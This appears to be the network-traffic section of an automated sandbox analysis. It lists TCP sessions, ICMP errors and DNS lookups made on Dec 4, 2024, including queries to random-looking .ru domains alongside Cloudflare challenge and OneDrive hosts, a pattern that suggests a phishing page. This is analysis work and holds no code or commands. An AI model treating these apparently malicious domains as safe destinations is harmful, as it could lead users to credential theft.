                                                                                                                              Dec 4, 2024 21:16:23.897917032 CET49787443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:23.898200989 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:23.898256063 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:23.898312092 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:23.898556948 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:23.898571014 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:23.931704044 CET44349786104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:23.931771040 CET44349786104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:23.931857109 CET49786443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:23.986190081 CET49786443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:23.986208916 CET44349786104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.140868902 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.141149044 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:25.141180992 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.142118931 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.142174006 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:25.143361092 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:25.143413067 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.143615961 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:25.143625021 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:25.195266962 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:28.740230083 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.740349054 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.740400076 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:28.741512060 CET49788443192.168.2.4172.67.189.38
                                                                                                                              Dec 4, 2024 21:16:28.741525888 CET44349788172.67.189.38192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.921017885 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:28.921056986 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.921114922 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:28.921366930 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:28.921380997 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.143100977 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.143418074 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.143435955 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.144404888 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.144474030 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.144762039 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.144773960 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.144814968 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.144828081 CET44349789104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.144884109 CET49789443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.145116091 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.145169020 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:30.145225048 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.145395041 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:30.145407915 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.540416956 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.540705919 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:31.540735960 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.541755915 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.541816950 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:31.542191029 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:31.542243004 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.542321920 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:31.542327881 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:31.584589958 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:32.355798960 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:32.355837107 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:32.355901957 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:32.356137991 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:32.356149912 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:32.417778015 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:32.417876959 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:32.419290066 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:32.419442892 CET49792443192.168.2.4104.21.65.72
                                                                                                                              Dec 4, 2024 21:16:32.419466019 CET44349792104.21.65.72192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:33.963062048 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:33.963289976 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:33.963326931 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:33.964378119 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:33.964432955 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:33.965466022 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:33.965523958 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:33.965720892 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:33.965727091 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.006378889 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:34.479199886 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.479218960 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.479265928 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:34.479293108 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.479301929 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.479341030 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:34.479693890 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:34.479710102 CET4434979313.107.139.11192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:34.479717970 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:34.479754925 CET49793443192.168.2.413.107.139.11
                                                                                                                              Dec 4, 2024 21:16:53.585392952 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:16:53.585426092 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:53.585835934 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:16:53.585835934 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:16:53.585870981 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:54.987253904 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:54.987551928 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:16:54.987575054 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:54.987919092 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:54.988210917 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:16:54.988267899 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:55.038889885 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:04.780194998 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:04.780266047 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:04.780388117 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:05.648085117 CET49835443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:05.648113012 CET44349835142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:53.649738073 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:53.649796963 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:53.649914026 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:53.650368929 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:53.650382042 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:55.066750050 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:55.067079067 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:55.067109108 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:55.067404985 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:55.067703962 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:17:55.067750931 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:55.117568970 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:18:04.864419937 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:18:04.864478111 CET44349965142.250.201.36192.168.2.4
                                                                                                                              Dec 4, 2024 21:18:04.864526987 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:18:05.180763960 CET49965443192.168.2.4142.250.201.36
                                                                                                                              Dec 4, 2024 21:18:05.180785894 CET44349965142.250.201.36192.168.2.4
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 4, 2024 21:15:49.458188057 CET6317353192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:49.458338976 CET4969053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:49.567811966 CET53531911.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:49.596774101 CET53648491.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:49.919866085 CET53496901.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:49.961968899 CET53631731.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:51.702295065 CET5659153192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:51.702455997 CET5547153192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:51.704442978 CET5651253192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:51.704595089 CET5521653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:51.841939926 CET53565911.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:51.855268955 CET53554711.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:51.856316090 CET53552161.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:52.007391930 CET53565121.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:52.355756998 CET53563331.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:53.524396896 CET6511853192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:53.524528027 CET5403953192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:53.665755987 CET53540391.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:53.749896049 CET53651181.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:53.966893911 CET5630653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:53.967741966 CET6278053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:53.978147984 CET5417253192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:53.988574028 CET5018753192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:54.109702110 CET53627801.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:54.195501089 CET53563061.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:54.428560972 CET53541721.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:54.429822922 CET53501871.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.092216969 CET5654053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.092353106 CET6013253192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.092791080 CET6135953192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.092921972 CET6398853192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.093256950 CET5759453192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.093405962 CET5741653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:15:58.233153105 CET53565401.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.290460110 CET53574161.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.290894985 CET53639881.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.291460991 CET53575941.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.292939901 CET53613591.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:15:58.323097944 CET53601321.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.569024086 CET6445353192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:00.569418907 CET6062153192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:00.711185932 CET53606211.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:00.794516087 CET53644531.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:01.746373892 CET53588931.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:02.069248915 CET5677153192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:02.069679022 CET5729053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:02.112682104 CET5066653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:02.112871885 CET6293753192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:02.213722944 CET53572901.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:02.213777065 CET53567711.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:02.252726078 CET53629371.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:02.252892017 CET53506661.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.870110989 CET6056253192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:06.870434999 CET6325053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:07.010900021 CET53605621.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.011435986 CET53632501.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:09.374492884 CET53629891.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:22.203521013 CET6278753192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:22.203658104 CET5167953192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:22.616269112 CET53627871.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:22.616508961 CET53516791.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.276076078 CET53510001.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.760343075 CET5089253192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:28.760473013 CET5574853192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:28.776807070 CET5959853192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:28.777139902 CET5539453192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:28.918725014 CET53595981.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:28.920505047 CET53553941.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:32.073745966 CET6501553192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:32.074068069 CET6464653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:38.850430012 CET5881753192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:38.850930929 CET4982653192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:38.859519958 CET6127053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:38.859661102 CET5899053192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:41.894289970 CET4926153192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:41.894428015 CET6372553192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:43.022813082 CET5260553192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:43.023176908 CET5204553192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:45.341923952 CET5220853192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:45.342056990 CET6008753192.168.2.41.1.1.1
                                                                                                                              Dec 4, 2024 21:16:49.169300079 CET53530801.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:51.011709929 CET53529801.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:17:21.069866896 CET53557531.1.1.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:18:05.321932077 CET53524831.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                              Dec 4, 2024 21:15:49.691987038 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:15:58.323326111 CET192.168.2.41.1.1.1c222(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:16:29.767066956 CET192.168.2.41.1.1.1c2d9(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:16:32.679297924 CET192.168.2.41.1.1.1c2c5(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:16:39.138925076 CET192.168.2.41.1.1.1c25f(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:16:41.771945000 CET192.168.2.41.1.1.1c241(Port unreachable)Destination Unreachable
                                                                                                                              Dec 4, 2024 21:16:44.036139965 CET192.168.2.41.1.1.1c263(Port unreachable)Destination Unreachable
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 4, 2024 21:15:49.458188057 CET192.168.2.41.1.1.10x67e2Standard query (0)karaokebooks.netA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:49.458338976 CET192.168.2.41.1.1.10xb75eStandard query (0)karaokebooks.net65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.702295065 CET192.168.2.41.1.1.10x7e6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.702455997 CET192.168.2.41.1.1.10x10cfStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.704442978 CET192.168.2.41.1.1.10x1eaStandard query (0)karaokebooks.netA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.704595089 CET192.168.2.41.1.1.10xae2eStandard query (0)karaokebooks.net65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.524396896 CET192.168.2.41.1.1.10x356fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.524528027 CET192.168.2.41.1.1.10x97adStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.966893911 CET192.168.2.41.1.1.10x1534Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.967741966 CET192.168.2.41.1.1.10x8193Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.978147984 CET192.168.2.41.1.1.10xb89cStandard query (0)h6n.xswpbsmx.ruA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.988574028 CET192.168.2.41.1.1.10x2429Standard query (0)h6n.xswpbsmx.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.092216969 CET192.168.2.41.1.1.10x904Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.092353106 CET192.168.2.41.1.1.10xf094Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.092791080 CET192.168.2.41.1.1.10x4b8eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.092921972 CET192.168.2.41.1.1.10x8a8eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.093256950 CET192.168.2.41.1.1.10x98e1Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.093405962 CET192.168.2.41.1.1.10x40d7Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.569024086 CET192.168.2.41.1.1.10x4115Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.569418907 CET192.168.2.41.1.1.10xf2b9Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.069248915 CET192.168.2.41.1.1.10xc8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.069679022 CET192.168.2.41.1.1.10xfa61Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.112682104 CET192.168.2.41.1.1.10x33faStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.112871885 CET192.168.2.41.1.1.10xcf5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:06.870110989 CET192.168.2.41.1.1.10x6750Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:06.870434999 CET192.168.2.41.1.1.10x91ccStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:22.203521013 CET192.168.2.41.1.1.10xb692Standard query (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:22.203658104 CET192.168.2.41.1.1.10x21eeStandard query (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.760343075 CET192.168.2.41.1.1.10xdb20Standard query (0)www.onedrive.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.760473013 CET192.168.2.41.1.1.10x95ccStandard query (0)www.onedrive.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.776807070 CET192.168.2.41.1.1.10x95eeStandard query (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.777139902 CET192.168.2.41.1.1.10x4e0dStandard query (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.073745966 CET192.168.2.41.1.1.10x4a5dStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.074068069 CET192.168.2.41.1.1.10x17c3Standard query (0)onedrive.live.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:38.850430012 CET192.168.2.41.1.1.10xaedStandard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:38.850930929 CET192.168.2.41.1.1.10xe340Standard query (0)assets.onestore.ms65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:38.859519958 CET192.168.2.41.1.1.10xcd21Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:38.859661102 CET192.168.2.41.1.1.10xf30Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:41.894289970 CET192.168.2.41.1.1.10x8d0aStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:41.894428015 CET192.168.2.41.1.1.10x5fceStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:43.022813082 CET192.168.2.41.1.1.10xc4aStandard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:43.023176908 CET192.168.2.41.1.1.10x4f4cStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:45.341923952 CET192.168.2.41.1.1.10x7b65Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:45.342056990 CET192.168.2.41.1.1.10xf1daStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 4, 2024 21:15:49.961968899 CET1.1.1.1192.168.2.40x67e2No error (0)karaokebooks.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:49.961968899 CET1.1.1.1192.168.2.40x67e2No error (0)karaokebooks.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:49.961968899 CET1.1.1.1192.168.2.40x67e2No error (0)karaokebooks.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.841939926 CET1.1.1.1192.168.2.40x7e6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.841939926 CET1.1.1.1192.168.2.40x7e6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:51.855268955 CET1.1.1.1192.168.2.40x10cfNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:52.007391930 CET1.1.1.1192.168.2.40x1eaNo error (0)karaokebooks.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:52.007391930 CET1.1.1.1192.168.2.40x1eaNo error (0)karaokebooks.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:52.007391930 CET1.1.1.1192.168.2.40x1eaNo error (0)karaokebooks.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.665755987 CET1.1.1.1192.168.2.40x97adNo error (0)www.google.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:53.749896049 CET1.1.1.1192.168.2.40x356fNo error (0)www.google.com142.250.201.36A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:54.109702110 CET1.1.1.1192.168.2.40x8193No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:54.195501089 CET1.1.1.1192.168.2.40x1534No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
